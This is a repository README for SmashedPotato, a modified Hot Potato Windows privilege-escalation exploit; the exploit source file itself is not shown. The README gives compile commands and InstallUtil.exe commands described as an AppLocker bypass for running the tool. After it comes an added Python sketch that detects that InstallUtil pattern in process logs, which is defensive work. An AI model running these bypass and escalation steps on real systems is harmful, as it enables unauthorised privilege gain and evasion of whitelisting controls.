├── README.md
└── SmashedPotato.cs

/README.md:
--------------------------------------------------------------------------------
# SmashedPotato
By Cn33liz 2016

A modification of @breenmachine's original Hot Potato privilege escalation exploit.

### Modifications:

* Merged all .NET assemblies into a single assembly and compressed it into a Byte[] array.
* Runs the Potato assembly from memory.
* Included the InstallUtil AppLocker bypass method (credits @SubTee).
* Added some automation.

To compile as an x86 binary:

```
cd \Windows\Microsoft.NET\Framework\v4.0.30319

csc.exe /out:"C:\Utils\SmashedPotatoX86.exe" /platform:x86 "C:\Utils\SmashedPotato.cs"
```

To compile as an x64 binary:

```
cd \Windows\Microsoft.NET\Framework64\v4.0.30319

csc.exe /out:"C:\Utils\SmashedPotatoX64.exe" /platform:x64 "C:\Utils\SmashedPotato.cs"
```

To run as an x86 binary and bypass AppLocker (credits for this great bypass go to Casey Smith aka subTee):

```
cd \Windows\Microsoft.NET\Framework\v4.0.30319

InstallUtil.exe /logfile= /LogToConsole=false /U C:\Utils\SmashedPotatoX86.exe
```

To run as an x64 binary and bypass AppLocker:

```
cd \Windows\Microsoft.NET\Framework64\v4.0.30319

InstallUtil.exe /logfile= /LogToConsole=false /U C:\Utils\SmashedPotatoX64.exe
```

### Shout-outs:

Go out to @breenmachine/@foxglovesec for their magnificent Potato code and @SubTee for his App Whitelisting techniques.
--------------------------------------------------------------------------------
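For defenders, the InstallUtil invocation in the README has a recognisable shape in process-creation logs: an uninstall run with logging switched off against an assembly outside the usual install locations. The following detection sketch is an added example, not part of the SmashedPotato project; the function names, the trusted-path list and the sample command lines are assumptions constructed for illustration.

```python
import re

# Tokens are runs of non-space characters; quoted segments may contain spaces.
TOKEN = re.compile(r'(?:"[^"]*"|\S)+')
# Assumption: directories where legitimately installed services live on this host.
TRUSTED_PREFIXES = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")

def installutil_findings(command_line):
    """Return the reasons a command line resembles the README's InstallUtil usage."""
    tokens = [t.replace('"', "") for t in TOKEN.findall(command_line)]
    if not tokens:
        return []
    image = re.split(r"[\\/]", tokens[0])[-1].lower()
    if image not in ("installutil.exe", "installutil"):
        return []
    findings = []
    for tok in filter(None, tokens[1:]):
        if tok[:1] in ("/", "-"):  # switch; "-" is treated like "/" to be safe
            name, _, value = tok[1:].partition("=")
            name = name.lower()
            if name in ("u", "uninstall"):
                findings.append("uninstall switch")
            elif name == "logfile" and value == "":
                findings.append("log file disabled")
            elif name == "logtoconsole" and value.lower() == "false":
                findings.append("console logging disabled")
        elif not tok.lower().startswith(TRUSTED_PREFIXES):
            findings.append("assembly outside trusted path: " + tok)
    return findings

def is_suspicious(command_line):
    """Alert when an uninstall run also suppresses InstallUtil's logging."""
    found = installutil_findings(command_line)
    return "uninstall switch" in found and any("disabled" in f for f in found)

SAMPLE_EVENTS = [  # constructed process-creation command lines
    r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Utils\SmashedPotatoX86.exe',
    r'InstallUtil.exe "C:\Program Files\Acme\AcmeService.exe"',
    r'csc.exe /out:"C:\Utils\SmashedPotatoX86.exe" /platform:x86 "C:\Utils\SmashedPotato.cs"',
]

if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        print(is_suspicious(line), installutil_findings(line))
```

Feed it the command-line field from whatever process-creation telemetry is collected, and tune `TRUSTED_PREFIXES` to the host's real install locations before alerting on the path finding.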